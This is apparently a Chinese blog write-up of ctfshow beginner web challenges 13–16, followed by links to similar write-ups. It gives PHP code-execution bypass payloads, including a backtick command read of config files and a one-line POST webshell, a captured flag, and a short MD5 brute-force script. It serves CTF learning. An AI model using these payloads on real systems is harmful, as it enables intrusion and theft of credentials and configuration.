wp ctfshow 萌新 web13--web16

已于 2024-04-05 18:27:24 修改
阅读量173 收藏 2
点赞数 8
文章标签: linux web安全
于 2024-03-28 17:08:35 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/2301_81040377/article/details/137115327
版权

#web

web13

说实话这道题拿不下来了,他给我;屏蔽了,去差wp,发现居然还有新方法      ls|grep con*

但是要注意要把ls|grep con*解析所以要          `ls|grep con*`,然后因为;别屏蔽了,那就用?>

?c=passthru("more `ls|grep con*`")?>

web14

屏蔽太多了,传马

?c=echo `$_POST[a]`?>

看不到上传成功没,那就试试

用heckbar,因为懒不想打开bp先按Load,点击Post data,因为我们不是在url传的所以大概率就POST了,因为常用的就这两个,然后直接a=cat config.php,到手

web15

这里照应一下前文,`` 的作用

绕过的越来越多了,还是传一个马吧

这道题没有像之前一样把“;”屏蔽,那就把上次用的木马换一下

?c=echo `$_POST[a]`;

还是heckbar,然后查看源代码

ctfshow{f31456e6-e3ea-4dd7-bfcf-4d7b923054e8}

web16

一个md5解密但是我怎么去找都解不出来,只能用脚本了

import hashlib
str1='abcdefghijklmnopqrstuvwxyz0123456789ABCDEFGHIJKLMNOPQRSTUVWXYZ'
for i in str1:
    for j in str1:
        for k in str1:
            s = hashlib.md5(('ctfshow'+i+j+k).encode()).hexdigest()
            #print(type(s))
            if s=='a6f57ae38a22448c2f07f3f95f49c84e':
                print(i+j+k)

发出请求?c=36d

到手

暂时不写了这个md5 的脚本我要研究一下

baozongwi
关注
  • 8
    点赞
  • 2
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
ctfshow-VIP题目-Web-详细解题思路
01-27
本文档总结了CTFSHOW-VIP题目-Web的详细解题思路,涵盖了多个Web安全领域的知识点,包括WP源码泄露、协议头信息泄露、robots后台泄露、phps源码泄露、源码压缩包泄露、版本控制泄露、vim临时文件泄露、cookie泄露、...
ctfshow-web41~60-WP
02-21
ctfshow-web41~60-WPctfshow-web41~60-WP
ctfshow web13-14
qq_61988806的博客
12-12 1059
ctfshow web13-14 文件上传的题 想办法搞到源码 常见得到源码的方法 .bak .git .hg 这里使用.bak得到源码 下载得到源码
CTF_ctfshow_web13_文件上传漏洞
weixin_54227009的博客
05-14 1428
打开靶机发现是个文件上传漏洞,上传了图片这些,都提示太大了 10344c8d-1054-45ac-ac38-f99ae5d4e476.challenge.ctf.show/upload.php.bak 然后upload.php.bak下载下来了源码,进行审计: <?php header("content-type:text/html;charset=utf-8"); $filename = $_FILES['file']['name']; $temp_name = $_...
【CTF Web】CTFShow web13 Writeup(RCE+PHP+通配符)
最新发布
HEX9CF的技术博客
05-29 494
1阿呆彻底呆了,阿呆拿起谷姐搜索好久,终于找到更狠的方法。
CTFshow-web-web13
qq_68581192的博客
10-27 227
user.ini中两个中的配置就是auto_prepend_file和auto_append_file。这两个配置的意思就是:我们指定一个文件(如1.jpg),那么该文件就会被包含在要执行的php文件中(如index.php),相当于在index.php中插入一句:require(./1.jpg)。由于后缀问题服务器无法解析该php语句,我们先上传a.txt,再上传.user.ini文件。先尝试在url后添加/upload.php.bak,发现直接下载了,我们打开下载的。.DS_Store文件泄漏。
ctfshow-萌新-web13( 利用代码执行漏洞获取网站敏感文件)
热门推荐
wangyuxiang946的博客
09-11 1万+
ctf.show萌新模块 web13关, 这一关的考点是代码执行漏洞, 需要灵活的运用各种命令执行函数, 源码中过滤了system, exec, highlight函数, cat命令, congfig, php, 点和分号等关键字, 推荐使用反引号`` 进行绕过 页面中展示了部分源码, 并提示 flag 就在 config.php 文件中 源码中过滤了参数中的 system exec highlight cat . ; file php config 等关键字, 这里可以使用 pass...
Hackbar插件安装
北冥同学的成长记录笔记
07-02 1万+
Hackbar是一款基于浏览器的简单的安全审计或者说是渗透测试工具,能够帮助测试人员测试sql注入,XSS漏洞和站点安全性,帮助开发人员对其代码进行安全审计。
web-stories-wp:WordPress的网络故事
02-05
建立状态 是一种免费的开放式Web视觉叙事格式,可让您轻松地通过引人入胜的动画和可点击的交互方式创建视觉叙事,并使读者沉浸在出色且快速加载的全屏体验中。 借助 ,我们提供了一流的Web Stories支持。 通过直接...
WebStack-Laravel-master.zip
07-14
一旦WordPress安装完毕,用户可以将WebStack-Laravel-master.zip文件上传到WordPress的主题目录中,通常位于wp-content/themes/。然后,通过WordPress的管理后台激活此主题,即可在网站上看到新的导航样式和布局。 ...
CtfHub-wpweb
01-23
本文主要探讨了CTF(Capture The Flag)竞赛中与Web安全相关的知识点,通过解决一系列问题,我们可以学习到如何发现和利用网站的漏洞获取关键信息。首先,提到了通过查找网站的备份文件来获取线索,例如在URL后添加...
ctfshow-web13 文件上传
HAI_WD的博客
08-25 1367
首先看到是一个上传页面,测试其他无果,遂进行目录遍历,发现upload.php.bak文件。然后上传1.txt,尝试使用get,但是没有生效,这里需要控制字符数量。上传好了之后,通过index.php进行访问。然后通过highlight_file读取文件。那么我们先上传.user.ini。
CTF show WEB13
羽的博客
02-18 5030
题目地址:http://ctf.show 进入题目是个文件上传的题目,尝试了一番文件上传漏洞利用的方法后,没有啥突破,可能有啥隐藏的目录,尝试源码泄露利用的方法,在输入upload.php.bak时成功下载下来源码。 .bak文件是备份文件。 这里列举一下常见的源码泄露 .hg源码泄漏 .git源码泄漏 .DS_Store文件泄漏,还有以.phps .bak结尾的网页 在we...
CTFSHOW系列-web13(信息收集-技术文档泄露)
siu~
11-27 575
CTFSHOW系列解题思路
ctfshow-萌新-web13( 利用代码执行漏洞获取网站敏感文件)_ctfshow web13
2301_82101171的博客
04-17 280
的过滤, 我们可以使用?对于从来没有接触过网络安全的同学,我们帮你准备了详细的学习成长路线图。可以说是最科学最系统的学习路线,大家跟着这个大的方向学习准没问题。反引号``会将其中的内容当做系统命令来执行, 并返回一个字符串类型的变量用来保存执行结果, 下面的payload会先执行。费时一周整理的160+网络安全面试题,金九银十,做网络安全面试里的显眼包!对于有1-3年工作经验,想要跳槽的朋友来说,也是很好的温习资料!对于从来没有接触过网络安全的同学,我们帮你准备了详细的。内容实在太多,不一一截图了。
ctfshow--web入门(web101--web115&web123&web125-web133)
qing_chuan_的博客
06-08 985
v2$v3反射,通俗来讲就是可以通过一个对象来获取所属类的具体内容,php中内置了强大的反射API:ReflectionClass:一个反射类,功能十分强大,内置了各种获取类信息的方法,创建方式为new ReflectionClass(str 类名),可以用echo new ReflectionClass(‘className’)打印类的信息。ReflectionObject:另一个反射类,创建方式为new ReflectionObject(对象名)。
CTFSHOW-WEB详解
qq_49422880的博客
05-25 4791
CTFSHOW-WEB详解一、WEB13--文件上传二、WEB-红包题第二弹 一、WEB13–文件上传   开始的界面就是文件上传,确定方向为文件上传漏洞分析,尝试上传文件,我上传的第一个文件是一个文本文件很小只有9个字节,就上传成功了直接,还以为会按往常一样出现绝对路径又或者提示只能上传别的格式文件,然后我们通过绕过,接着使用蚁剑连接直接看文件拿到flag。   然而。。。。。。   简单的信息泄露例子,看完绝对不亏.   事情没有我们想的那么简单,我上传一个webshell的时候,发现内容超过了大小,又
2024年网络安全山东省赛-SMB信息收集解析(中职组)_使用访问工具对服务器服务访问,将服务器中管理员桌面的文本文档里的内容作为 flag
2401_84252281的博客
04-26 750
任务环境说明:服务器场景:Server1。
【CTF Web】CTFShow web13 Writeup(PHP+文件上传+RCE)
HEX9CF的技术博客
04-28 475
5。
ctfshow-__萌新隐写
09-14
根据引用中提到的内容,CTFShow "萌心区"WP详解(上)涉及了一些关于萌新认证的内容,其中包括了密码、隐写和杂项等方面的题目。而引用中提到,下载的文件是一个word文件,里面包含了一张图,并且提示说找到了FLAG。...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值